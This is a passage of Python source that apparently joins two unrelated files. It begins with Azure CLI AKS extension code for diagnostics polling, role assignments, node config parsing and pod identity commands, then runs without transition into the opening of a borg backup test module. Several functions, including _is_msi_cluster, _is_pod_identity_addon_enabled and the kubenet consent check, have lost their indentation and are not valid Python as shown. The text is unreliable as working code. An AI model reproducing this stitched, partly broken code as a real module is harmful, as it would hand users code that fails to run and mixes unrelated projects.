    if not diag_settings.value:
        print("No diag settings specified")
        return None
    return diag_settings.value[0].storage_account_id
def display_diagnostics_report(temp_kubeconfig_path):   # pylint: disable=too-many-statements
    """Poll aks-periscope diagnostic results via kubectl and print them.

    Waits until one "apd" (aks-periscope diagnostic) resource exists per
    Ready node, then collects each node's network configuration and outbound
    connectivity results and prints them as tables.

    :param temp_kubeconfig_path: path to a kubeconfig for the target cluster.
    :raises CLIError: if kubectl is not on PATH or a kubectl call fails.
    """
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    nodes = subprocess.check_output(
        ["kubectl", "--kubeconfig", temp_kubeconfig_path,
         "get", "node", "--no-headers"],
        universal_newlines=True)
    logger.debug(nodes)
    node_lines = nodes.splitlines()
    # node name -> True once its diagnostics have been collected
    ready_nodes = {}
    for node_line in node_lines:
        columns = node_line.split()
        logger.debug(node_line)
        if columns[1] != "Ready":
            logger.warning(
                "Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
        else:
            ready_nodes[columns[0]] = False
    logger.debug('There are %s ready nodes in the cluster',
                 str(len(ready_nodes)))
    if not ready_nodes:
        logger.warning(
            'No nodes are ready in the current cluster. Diagnostics info might not be available.')
    network_config_array = []
    network_status_array = []
    apds_created = False
    max_retry = 10
    for retry in range(0, max_retry):
        if not apds_created:
            # phase 1: wait until every ready node has an apd resource
            apd = subprocess.check_output(
                ["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
                 "apd", "-n", "aks-periscope", "--no-headers"],
                universal_newlines=True
            )
            apd_lines = apd.splitlines()
            if apd_lines and 'No resources found' in apd_lines[0]:
                apd_lines.pop(0)
            # \r + end='' keeps the progress message on one updating line
            print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
                                                                            len(ready_nodes),
                                                                            '.' * retry), end='')
            if len(apd_lines) < len(ready_nodes):
                time.sleep(3)
            else:
                apds_created = True
                print()
        else:
            # phase 2: read each node's diagnostics, re-polling nodes whose
            # results are not populated yet
            for node_name in ready_nodes:
                if ready_nodes[node_name]:
                    continue
                apdName = "aks-periscope-diagnostic-" + node_name
                try:
                    network_config = subprocess.check_output(
                        ["kubectl", "--kubeconfig", temp_kubeconfig_path,
                         "get", "apd", apdName, "-n",
                         "aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
                        universal_newlines=True)
                    logger.debug('Dns status for node %s is %s',
                                 node_name, network_config)
                    network_status = subprocess.check_output(
                        ["kubectl", "--kubeconfig", temp_kubeconfig_path,
                         "get", "apd", apdName, "-n",
                         "aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
                        universal_newlines=True)
                    logger.debug('Network status for node %s is %s',
                                 node_name, network_status)
                    if not network_config or not network_status:
                        print("The diagnostics information for node {} is not ready yet. "
                              "Will try again in 10 seconds.".format(node_name))
                        time.sleep(10)
                        break
                    network_config_array += json.loads(
                        '[' + network_config + ']')
                    network_status_object = json.loads(network_status)
                    network_status_array += format_diag_status(
                        network_status_object)
                    ready_nodes[node_name] = True
                except subprocess.CalledProcessError as err:
                    raise CLIError(err.output)
    print()
    if network_config_array:
        print("Below are the network configuration for each node: ")
        print()
        print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
        print()
    else:
        logger.warning("Could not get network config. "
                       "Please run 'az aks kanalyze' command later to get the analysis results.")
    if network_status_array:
        print("Below are the network connectivity results for each node:")
        print()
        print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
    else:
        logger.warning("Could not get networking status. "
                       "Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
    """Colorize each entry's "Status" in place: red when it contains "Error:", green otherwise."""
    for entry in diag_status:
        status = entry["Status"]
        if not status:
            continue
        color = colorama.Fore.RED if "Error:" in status else colorama.Fore.GREEN
        entry["Status"] = '{}{}{}'.format(color, status, colorama.Style.RESET_ALL)
    return diag_status
def format_bright(msg):
    """Return *msg* wrapped in ANSI bold + colorama BRIGHT, with styles reset at the end."""
    return '\033[1m{}{}{}'.format(colorama.Style.BRIGHT, msg, colorama.Style.RESET_ALL)
def format_hyperlink(the_link):
    """Return *the_link* rendered bold and blue, with styles reset at the end."""
    return '\033[1m{}{}{}{}'.format(
        colorama.Style.BRIGHT, colorama.Fore.BLUE, the_link, colorama.Style.RESET_ALL)
def get_aks_custom_headers(aks_custom_headers=None):
    """Parse a comma-separated "key=value" string into a headers dict.

    Returns an empty dict for ``None`` or ``""``.

    :raises CLIError: when any pair is not exactly "key=value".
    """
    headers = {}
    if not aks_custom_headers:
        return headers
    for pair in aks_custom_headers.split(','):
        parts = pair.split('=')
        if len(parts) != 2:
            raise CLIError('custom headers format is incorrect')
        key, value = parts
        headers[key] = value
    return headers
def _put_managed_cluster_ensuring_permission(
        cmd,     # pylint: disable=too-many-locals,too-many-statements,too-many-branches
        client,
        subscription_id,
        resource_group_name,
        name,
        managed_cluster,
        monitoring_addon_enabled,
        ingress_appgw_addon_enabled,
        virtual_node_addon_enabled,
        need_grant_vnet_permission_to_cluster_identity,
        vnet_subnet_id,
        enable_managed_identity,
        attach_acr,
        headers,
        no_wait
):
    """Create/update the managed cluster, then grant any role assignments that
    depend on identities produced by the cluster.

    When a post-creation role assignment is needed (monitoring, appgw ingress,
    virtual node, vnet grant, or ACR attach with managed identity), the call
    waits for the long-running operation so the created identities are
    available; otherwise it honors ``no_wait``.

    :return: the created/updated managed cluster (or the LRO poller in the
        no-wait path).
    """
    # some addons require post cluster creation role assignment
    need_post_creation_role_assignment = (monitoring_addon_enabled or
                                          ingress_appgw_addon_enabled or
                                          (enable_managed_identity and attach_acr) or
                                          virtual_node_addon_enabled or
                                          need_grant_vnet_permission_to_cluster_identity)
    if need_post_creation_role_assignment:
        # adding a wait here since we rely on the result for role assignment
        cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
            resource_group_name=resource_group_name,
            resource_name=name,
            parameters=managed_cluster,
            headers=headers))
        cloud_name = cmd.cli_ctx.cloud.name
        # add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
        # mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
        if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
            from msrestazure.tools import resource_id
            cluster_resource_id = resource_id(
                subscription=subscription_id,
                resource_group=resource_group_name,
                namespace='Microsoft.ContainerService', type='managedClusters',
                name=name
            )
            _add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
        if ingress_appgw_addon_enabled:
            _add_ingress_appgw_addon_role_assignment(cluster, cmd)
        if virtual_node_addon_enabled:
            _add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
        if need_grant_vnet_permission_to_cluster_identity:
            # failure here is non-fatal: warn and let the user grant manually
            if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                           cluster.identity.principal_id, scope=vnet_subnet_id,
                                           resolve_assignee=False):
                logger.warning('Could not create a role assignment for subnet. '
                               'Are you an Owner on this subscription?')
        if enable_managed_identity and attach_acr:
            # Attach ACR to cluster enabled managed identity
            if cluster.identity_profile is None or \
                    cluster.identity_profile["kubeletidentity"] is None:
                logger.warning('Your cluster is successfully created, but we failed to attach '
                               'acr to it, you can manually grant permission to the identity '
                               'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
                               'it permission to pull from ACR.')
            else:
                kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
                _ensure_aks_acr(cmd.cli_ctx,
                                client_id=kubelet_identity_client_id,
                                acr_name_or_id=attach_acr,
                                subscription_id=subscription_id)
    else:
        # nothing to grant afterwards: submit and optionally return without waiting
        cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
                              resource_group_name=resource_group_name,
                              resource_name=name,
                              parameters=managed_cluster,
                              headers=headers)
    return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_kubelet_config(file_path):
    """Load a kubelet configuration JSON file into a KubeletConfig model.

    :raises CLIError: when the file is missing or does not contain a JSON object.
    """
    if not os.path.isfile(file_path):
        raise CLIError("{} is not valid file, or not accessable.".format(file_path))
    kubelet_config = get_file_json(file_path)
    if not isinstance(kubelet_config, dict):
        raise CLIError(
            "Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
    config_object = KubeletConfig()
    # Map camelCase JSON keys onto the SDK model's snake_case attributes;
    # missing keys become None.
    field_map = {
        'cpu_manager_policy': 'cpuManagerPolicy',
        'cpu_cfs_quota': 'cpuCfsQuota',
        'cpu_cfs_quota_period': 'cpuCfsQuotaPeriod',
        'image_gc_high_threshold': 'imageGcHighThreshold',
        'image_gc_low_threshold': 'imageGcLowThreshold',
        'topology_manager_policy': 'topologyManagerPolicy',
        'allowed_unsafe_sysctls': 'allowedUnsafeSysctls',
        'fail_swap_on': 'failSwapOn',
        'container_log_max_files': 'containerLogMaxFiles',
        'container_log_max_size_mb': 'containerLogMaxSizeMB',
    }
    for attr, json_key in field_map.items():
        setattr(config_object, attr, kubelet_config.get(json_key, None))
    return config_object
def _get_linux_os_config(file_path):
    """Load a Linux OS configuration JSON file into a LinuxOSConfig model.

    The file must be a JSON object and must contain a "sysctls" object.

    :raises CLIError: when the file is missing, is not a JSON object, or has
        no valid "sysctls" section.
    """
    if not os.path.isfile(file_path):
        raise CLIError("{} is not valid file, or not accessable.".format(file_path))
    os_config = get_file_json(file_path)
    if not isinstance(os_config, dict):
        raise CLIError(
            "Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
    config_object = LinuxOSConfig()
    # top-level settings: camelCase JSON key -> snake_case model attribute
    for attr, json_key in (('transparent_huge_page_enabled', 'transparentHugePageEnabled'),
                           ('transparent_huge_page_defrag', 'transparentHugePageDefrag'),
                           ('swap_file_size_mb', 'swapFileSizeMB')):
        setattr(config_object, attr, os_config.get(json_key, None))
    # sysctl settings
    sysctls = os_config.get("sysctls", None)
    if not isinstance(sysctls, dict):
        raise CLIError(
            "Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
    config_object.sysctls = SysctlConfig()
    # NOTE: 'net_ipv4_tcpkeepalive_intvl' / 'netIpv4TcpkeepaliveIntvl' keep
    # their odd casing on purpose — they match the SDK model attribute name.
    sysctl_map = {
        'net_core_somaxconn': 'netCoreSomaxconn',
        'net_core_netdev_max_backlog': 'netCoreNetdevMaxBacklog',
        'net_core_rmem_max': 'netCoreRmemMax',
        'net_core_wmem_max': 'netCoreWmemMax',
        'net_core_optmem_max': 'netCoreOptmemMax',
        'net_ipv4_tcp_max_syn_backlog': 'netIpv4TcpMaxSynBacklog',
        'net_ipv4_tcp_max_tw_buckets': 'netIpv4TcpMaxTwBuckets',
        'net_ipv4_tcp_fin_timeout': 'netIpv4TcpFinTimeout',
        'net_ipv4_tcp_keepalive_time': 'netIpv4TcpKeepaliveTime',
        'net_ipv4_tcp_keepalive_probes': 'netIpv4TcpKeepaliveProbes',
        'net_ipv4_tcpkeepalive_intvl': 'netIpv4TcpkeepaliveIntvl',
        'net_ipv4_tcp_rmem': 'netIpv4TcpRmem',
        'net_ipv4_tcp_wmem': 'netIpv4TcpWmem',
        'net_ipv4_tcp_tw_reuse': 'netIpv4TcpTwReuse',
        'net_ipv4_ip_local_port_range': 'netIpv4IpLocalPortRange',
        'net_ipv4_neigh_default_gc_thresh1': 'netIpv4NeighDefaultGcThresh1',
        'net_ipv4_neigh_default_gc_thresh2': 'netIpv4NeighDefaultGcThresh2',
        'net_ipv4_neigh_default_gc_thresh3': 'netIpv4NeighDefaultGcThresh3',
        'net_netfilter_nf_conntrack_max': 'netNetfilterNfConntrackMax',
        'net_netfilter_nf_conntrack_buckets': 'netNetfilterNfConntrackBuckets',
        'fs_inotify_max_user_watches': 'fsInotifyMaxUserWatches',
        'fs_file_max': 'fsFileMax',
        'fs_aio_max_nr': 'fsAioMaxNr',
        'fs_nr_open': 'fsNrOpen',
        'kernel_threads_max': 'kernelThreadsMax',
        'vm_max_map_count': 'vmMaxMapCount',
        'vm_swappiness': 'vmSwappiness',
        'vm_vfs_cache_pressure': 'vmVfsCachePressure',
    }
    for attr, json_key in sysctl_map.items():
        setattr(config_object.sysctls, attr, sysctls.get(json_key, None))
    return config_object
def _get_http_proxy_config(file_path):
    """Load an HTTP proxy configuration JSON file into a ManagedClusterHTTPProxyConfig model.

    :raises CLIError: when the file is missing or is not a JSON object.
    """
    if not os.path.isfile(file_path):
        raise CLIError("{} is not valid file, or not accessable.".format(file_path))
    hp_config = get_file_json(file_path)
    if not isinstance(hp_config, dict):
        raise CLIError(
            "Error reading Http Proxy Config at {}. Please see https://aka.ms/HttpProxyConfig for correct format.".format(file_path))
    config_object = ManagedClusterHTTPProxyConfig()
    # camelCase JSON key -> snake_case model attribute; missing keys become None
    for attr, json_key in (('http_proxy', 'httpProxy'),
                           ('https_proxy', 'httpsProxy'),
                           ('no_proxy', 'noProxy'),
                           ('trusted_ca', 'trustedCa')):
        setattr(config_object, attr, hp_config.get(json_key, None))
    return config_object
def _is_pod_identity_addon_enabled(instance):
if not instance:
return False
if not instance.pod_identity_profile:
return False
return bool(instance.pod_identity_profile.enabled)
def _ensure_pod_identity_addon_is_enabled(instance):
    """Raise CLIError unless the pod identity addon is enabled on *instance*."""
    if not _is_pod_identity_addon_enabled(instance):
        # Bug fix: the closing quote of the suggested command was missing,
        # which rendered a confusing, unbalanced message to the user.
        raise CLIError('The pod identity addon is not enabled for this managed cluster yet.\n'
                       'To enable, run "az aks update --enable-pod-identity"')
def _ensure_pod_identity_kubenet_consent(network_profile, pod_identity_profile, customer_consent):
if not network_profile or not network_profile.network_plugin:
# invalid data
return
if network_profile.network_plugin.lower() != 'kubenet':
# not kubenet, no need to check
return
if customer_consent is None:
# no set this time, read from previous value
customer_consent = bool(
pod_identity_profile.allow_network_plugin_kubenet)
if not customer_consent:
raise CLIError(
'--enable-pod-identity-with-kubenet is required for enabling pod identity addon when using Kubenet network plugin')
pod_identity_profile.allow_network_plugin_kubenet = True
def _update_addon_pod_identity(instance, enable, pod_identities=None, pod_identity_exceptions=None, allow_kubenet_consent=None):
    """Rewrite the cluster's pod identity profile in place.

    Disabling drops any previously stored identities and exceptions. Enabling
    (re)creates the profile when absent, validates kubenet consent, and stores
    the given identities/exceptions (empty lists when None).
    """
    if not enable:
        # when disable, remove previous saved values
        instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
            enabled=False)
        return
    if not instance.pod_identity_profile:
        # first enablement: build a fresh profile
        instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
            enabled=enable,
            user_assigned_identities=pod_identities,
            user_assigned_identity_exceptions=pod_identity_exceptions,
        )
    # kubenet clusters require explicit consent before pod identity may be used
    _ensure_pod_identity_kubenet_consent(
        instance.network_profile, instance.pod_identity_profile, allow_kubenet_consent)
    profile = instance.pod_identity_profile
    profile.enabled = enable
    profile.user_assigned_identities = pod_identities or []
    profile.user_assigned_identity_exceptions = pod_identity_exceptions or []
def _ensure_managed_identity_operator_permission(cli_ctx, instance, scope):
    """Ensure the cluster's control-plane identity holds the Managed Identity
    Operator role over *scope* (a user-assigned identity resource id).

    A new assignment is created only when no equivalent one (same scope, role
    and principal) already exists.

    :raises CLIError: for an unsupported identity type, an unresolvable
        cluster identity, or when the role assignment cannot be created.
    """
    cluster_identity_object_id = None
    if instance.identity.type.lower() == 'userassigned':
        # the first user-assigned identity acts as the cluster identity
        for identity in instance.identity.user_assigned_identities.values():
            cluster_identity_object_id = identity.principal_id
            break
    elif instance.identity.type.lower() == 'systemassigned':
        cluster_identity_object_id = instance.identity.principal_id
    else:
        raise CLIError('unsupported identity type: {}'.format(
            instance.identity.type))
    if cluster_identity_object_id is None:
        raise CLIError('unable to resolve cluster identity')
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    # skip creation when an identical assignment already exists at exactly this scope
    for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
        if i.scope.lower() != scope.lower():
            continue
        if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
            continue
        if i.principal_id.lower() != cluster_identity_object_id.lower():
            continue
        # already assigned
        return
    if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
                                is_service_principal=False, scope=scope):
        raise CLIError(
            'Could not grant Managed Identity Operator permission for cluster')
    # need more time to propagate this assignment...
    print()
    print('Wait 30 seconds for identity role assignment propagation.')
    time.sleep(30)
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
                         identity_name, identity_namespace, identity_resource_id,
                         binding_selector=None,
                         no_wait=False):  # pylint: disable=unused-argument
    """Add a pod identity to the cluster and push the updated cluster to the service."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)
    user_assigned_identity = _get_user_assigned_identity(
        cmd.cli_ctx, identity_resource_id)
    # the cluster identity must be allowed to operate the user-assigned identity
    _ensure_managed_identity_operator_permission(
        cmd.cli_ctx, instance, user_assigned_identity.id)
    pod_identity = ManagedClusterPodIdentity(
        name=identity_name,
        namespace=identity_namespace,
        identity=UserAssignedIdentity(
            resource_id=user_assigned_identity.id,
            client_id=user_assigned_identity.client_id,
            object_id=user_assigned_identity.principal_id,
        )
    )
    if binding_selector is not None:
        pod_identity.binding_selector = binding_selector
    pod_identities = list(instance.pod_identity_profile.user_assigned_identities or [])
    pod_identities.append(pod_identity)
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=pod_identities,
        pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
    )
    # send the updated managed cluster representation to update the pod identity addon
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
                            identity_name, identity_namespace,
                            no_wait=False):  # pylint: disable=unused-argument
    """Remove the pod identity matching name and namespace, then update the cluster."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)
    existing = instance.pod_identity_profile.user_assigned_identities or []
    # keep everything except the identity matching both name and namespace
    pod_identities = [
        pod_identity for pod_identity in existing
        if not (pod_identity.name == identity_name and pod_identity.namespace == identity_namespace)
    ]
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=pod_identities,
        pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
    )
    # send the updated managed cluster representation to update the pod identity addon
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name):  # pylint: disable=unused-argument
    """Show the managed cluster (null properties stripped), including its pod identities."""
    managed_cluster = client.get(resource_group_name, cluster_name)
    return _remove_nulls([managed_cluster])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
                                   exc_name, exc_namespace, pod_labels, no_wait=False):  # pylint: disable=unused-argument
    """Append a pod identity exception and push the updated cluster to the service."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)
    pod_identity_exceptions = list(
        instance.pod_identity_profile.user_assigned_identity_exceptions or [])
    pod_identity_exceptions.append(ManagedClusterPodIdentityException(
        name=exc_name, namespace=exc_namespace, pod_labels=pod_labels))
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=instance.pod_identity_profile.user_assigned_identities,
        pod_identity_exceptions=pod_identity_exceptions,
    )
    # send the updated managed cluster representation to update the pod identity addon
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
                                      exc_name, exc_namespace, no_wait=False):  # pylint: disable=unused-argument
    """Remove the pod identity exception matching name and namespace, then update the cluster."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)
    existing = instance.pod_identity_profile.user_assigned_identity_exceptions or []
    # keep everything except the exception matching both name and namespace
    pod_identity_exceptions = [
        exc for exc in existing
        if not (exc.name == exc_name and exc.namespace == exc_namespace)
    ]
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=instance.pod_identity_profile.user_assigned_identities,
        pod_identity_exceptions=pod_identity_exceptions,
    )
    # send the updated managed cluster representation to update the pod identity addon
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
                                      exc_name, exc_namespace, pod_labels, no_wait=False):  # pylint: disable=unused-argument
    """Replace an existing pod identity exception's pod labels, then update the cluster.

    :raises CLIError: when no exception with the given name/namespace exists.
    """
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)
    updated_exc = ManagedClusterPodIdentityException(
        name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
    existing = instance.pod_identity_profile.user_assigned_identity_exceptions or []
    found_target = False
    pod_identity_exceptions = []
    for exc in existing:
        if exc.name == exc_name and exc.namespace == exc_namespace:
            # swap in the updated exception, preserving list order
            found_target = True
            pod_identity_exceptions.append(updated_exc)
        else:
            pod_identity_exceptions.append(exc)
    if not found_target:
        raise CLIError(
            'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=instance.pod_identity_profile.user_assigned_identities,
        pod_identity_exceptions=pod_identity_exceptions,
    )
    # send the updated managed cluster representation to update the pod identity addon
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
    """Show the managed cluster (null properties stripped), including its pod identity exceptions."""
    managed_cluster = client.get(resource_group_name, cluster_name)
    return _remove_nulls([managed_cluster])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
    """Ensure the cluster identity can operate the kubelet identity at *scope*.

    Grants the Managed Identity Operator role to *cluster_identity_object_id*
    over *scope* unless an identical assignment (same scope, role and
    principal) already exists.

    :raises CLIError: when the role assignment cannot be created.
    """
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    # skip creation when an identical assignment already exists at exactly this scope
    for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
        if i.scope.lower() != scope.lower():
            continue
        if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
            continue
        if i.principal_id.lower() != cluster_identity_object_id.lower():
            continue
        # already assigned
        return
    if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
                                is_service_principal=False, scope=scope):
        raise CLIError('Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
def aks_egress_endpoints_list(cmd, client, resource_group_name, name):  # pylint: disable=unused-argument
    """List the egress (outbound network dependency) endpoints of a managed cluster."""
    endpoints = client.list_outbound_network_dependencies_endpoints(resource_group_name, name)
    return endpoints
|
archiver.py | import argparse
import errno
import io
import json
import logging
import os
import pstats
import random
import re
import shutil
import socket
import stat
import subprocess
import sys
import tempfile
import time
import unittest
from binascii import unhexlify, b2a_base64
from configparser import ConfigParser
from datetime import datetime
from datetime import timezone
from datetime import timedelta
from hashlib import sha256
from io import BytesIO, StringIO
from unittest.mock import patch
import pytest
try:
import llfuse
except ImportError:
pass
import borg
from .. import xattr, helpers, platform
from ..archive import Archive, ChunkBuffer
from ..archiver import Archiver, parse_storage_quota, PURE_PYTHON_MSGPACK_WARNING
from ..cache import Cache, LocalCache
from ..constants import * # NOQA
from ..crypto.low_level import bytes_to_long, num_cipher_blocks
from ..crypto.key import KeyfileKeyBase, RepoKey, KeyfileKey, Passphrase, TAMRequiredError
from ..crypto.keymanager import RepoIdMismatch, NotABorgKeyFile
from ..crypto.file_integrity import FileIntegrityError
from ..helpers import Location, get_security_dir
from ..helpers import Manifest, MandatoryFeatureUnsupported
from ..helpers import EXIT_SUCCESS, EXIT_WARNING, EXIT_ERROR
from ..helpers import bin_to_hex
from ..helpers import MAX_S
from ..helpers import msgpack
from ..helpers import flags_noatime, flags_normal
from ..nanorst import RstToTextLazy, rst_to_terminal
from ..patterns import IECommand, PatternMatcher, parse_pattern
from ..item import Item, ItemDiff
from ..logger import setup_logging
from ..remote import RemoteRepository, PathNotAllowed
from ..repository import Repository
from . import has_lchflags, has_llfuse
from . import BaseTestCase, changedir, environment_variable, no_selinux
from . import are_symlinks_supported, are_hardlinks_supported, are_fifos_supported, is_utime_fully_supported, is_birthtime_fully_supported
from .platform import fakeroot_detected
from .upgrader import make_attic_repo
from . import key
src_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
def exec_cmd(*args, archiver=None, fork=False, exe=None, input=b'', binary_output=False, **kw):
    """Run a borg command and return ``(exit_code, output)``.

    With ``fork=True`` the command runs as a real subprocess (the python
    module, or the ``exe`` binary when given); otherwise it executes
    in-process through an ``Archiver`` instance with stdio temporarily
    redirected.

    :param archiver: reuse an existing Archiver instance (in-process mode only).
    :param exe: None for "python -m borg.archiver", or a str naming the binary.
    :param input: bytes fed to stdin.
    :param binary_output: return the output as bytes instead of decoded str.
    """
    if fork:
        try:
            if exe is None:
                borg = (sys.executable, '-m', 'borg.archiver')
            elif isinstance(exe, str):
                borg = (exe, )
            elif not isinstance(exe, tuple):
                raise ValueError('exe must be None, a tuple or a str')
            output = subprocess.check_output(borg + args, stderr=subprocess.STDOUT, input=input)
            ret = 0
        except subprocess.CalledProcessError as e:
            output = e.output
            ret = e.returncode
        except SystemExit as e:  # possibly raised by argparse
            output = ''
            ret = e.code
        if binary_output:
            return ret, output
        else:
            return ret, os.fsdecode(output)
    else:
        # in-process: swap out stdio, run the Archiver, then restore stdio
        stdin, stdout, stderr = sys.stdin, sys.stdout, sys.stderr
        try:
            sys.stdin = StringIO(input.decode())
            sys.stdin.buffer = BytesIO(input)
            output = BytesIO()
            # Always use utf-8 here, to simply .decode() below
            output_text = sys.stdout = sys.stderr = io.TextIOWrapper(output, encoding='utf-8')
            if archiver is None:
                archiver = Archiver()
            archiver.prerun_checks = lambda *args: None
            archiver.exit_code = EXIT_SUCCESS
            helpers.exit_code = EXIT_SUCCESS
            try:
                args = archiver.parse_args(list(args))
                # argparse parsing may raise SystemExit when the command line is bad or
                # actions that abort early (eg. --help) were given. Catch this and return
                # the error code as-if we invoked a Borg binary.
            except SystemExit as e:
                output_text.flush()
                return e.code, output.getvalue() if binary_output else output.getvalue().decode()
            ret = archiver.run(args)
            output_text.flush()
            return ret, output.getvalue() if binary_output else output.getvalue().decode()
        finally:
            sys.stdin, sys.stdout, sys.stderr = stdin, stdout, stderr
def have_gnutar():
    """Return True when a GNU tar binary is available on PATH."""
    if not shutil.which('tar'):
        return False
    # subprocess.run waits for the process and closes the stdout pipe,
    # avoiding the unclosed-pipe ResourceWarning the bare Popen could emit.
    result = subprocess.run(['tar', '--version'], stdout=subprocess.PIPE)
    return b'GNU tar' in result.stdout
# check if the binary "borg.exe" is available (for local testing a symlink to virtualenv/bin/borg should do)
try:
    exec_cmd('help', exe='borg.exe', fork=True)
    # the binary exists and runs: test both the python module and the binary
    BORG_EXES = ['python', 'binary', ]
except FileNotFoundError:
    # no borg.exe around: only test via the python module
    BORG_EXES = ['python', ]
@pytest.fixture(params=BORG_EXES)
def cmd(request):
    """Parametrized fixture running borg via the python module and, when
    available, via the ``borg.exe`` binary.

    Returns a callable with the same signature as :func:`exec_cmd`, always
    forking so both flavors run as real subprocesses.
    """
    if request.param == 'python':
        exe = None
    elif request.param == 'binary':
        exe = 'borg.exe'
    else:
        raise ValueError("param must be 'python' or 'binary'")
    def exec_fn(*args, **kw):
        return exec_cmd(*args, exe=exe, fork=True, **kw)
    return exec_fn
def test_return_codes(cmd, tmpdir):
    """Check borg's process exit codes: success for init/create/extract,
    warning for an extract pattern that matches nothing, error for a
    duplicate archive name."""
    repo = tmpdir.mkdir('repo')
    input = tmpdir.mkdir('input')
    output = tmpdir.mkdir('output')
    input.join('test_file').write('content')
    rc, out = cmd('init', '--encryption=none', '%s' % str(repo))
    assert rc == EXIT_SUCCESS
    rc, out = cmd('create', '%s::archive' % repo, str(input))
    assert rc == EXIT_SUCCESS
    with changedir(str(output)):
        rc, out = cmd('extract', '%s::archive' % repo)
        assert rc == EXIT_SUCCESS
        rc, out = cmd('extract', '%s::archive' % repo, 'does/not/match')
        assert rc == EXIT_WARNING  # pattern did not match
    rc, out = cmd('create', '%s::archive' % repo, str(input))
    assert rc == EXIT_ERROR  # duplicate archive name
"""
test_disk_full is very slow and not recommended to be included in daily testing.
for this test, an empty, writable 16MB filesystem mounted on DF_MOUNT is required.
for speed and other reasons, it is recommended that the underlying block device is
in RAM, not a magnetic or flash disk.
assuming /tmp is a tmpfs (in memory filesystem), one can use this:
dd if=/dev/zero of=/tmp/borg-disk bs=16M count=1
mkfs.ext4 /tmp/borg-disk
mkdir /tmp/borg-mount
sudo mount /tmp/borg-disk /tmp/borg-mount
if the directory does not exist, the test will be skipped.
"""
DF_MOUNT = '/tmp/borg-mount'
@pytest.mark.skipif(not os.path.exists(DF_MOUNT), reason="needs a 16MB fs mounted on %s" % DF_MOUNT)
def test_disk_full(cmd):
    """Repeatedly fill the tiny DF_MOUNT filesystem while creating archives,
    then verify that after freeing some space 'borg check --repair' brings
    the repository back into a usable state."""
    def make_files(dir, count, size, rnd=True):
        # recreate *dir* with up to *count* files of up to *size* random bytes
        # (exact count/size when rnd=False)
        shutil.rmtree(dir, ignore_errors=True)
        os.mkdir(dir)
        if rnd:
